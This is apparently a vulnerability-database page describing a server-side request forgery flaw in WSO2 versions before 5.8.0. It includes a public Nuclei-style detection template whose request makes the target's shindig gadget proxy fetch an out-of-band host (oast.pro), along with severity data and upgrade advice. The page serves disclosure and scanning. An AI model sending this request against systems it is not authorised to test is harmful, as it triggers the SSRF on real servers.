WSO2-2019-0598: WSO2 <5.8.0 - Server Side Request Forgery

日期: 2025-08-01 | 影响软件: WSO2 | POC: 已公开

漏洞描述

WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.

PoC代码[已公开]

id: WSO2-2019-0598

info:
  name: WSO2 <5.8.0 - Server Side Request Forgery
  author: Amnotacat
  severity: medium
  description: |
    WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.
  remediation: |
    Upgrade the product version to 5.8.0 or higher.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
  tags: ssrf,wso2,shindig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Interactsh Server"

      - type: status
        status:
          - 200
# digest: 490a00463044022015641a9b7546f66c8b2e05a6e6aa362b7dfcb505d1642dd0537d3057db62f63002203caa43bb4112288ceffd7741ff09dcac184f98a3991627f0999d2d11fcc07a37:922c64590222798bb761d5b6d8e72950

相关漏洞推荐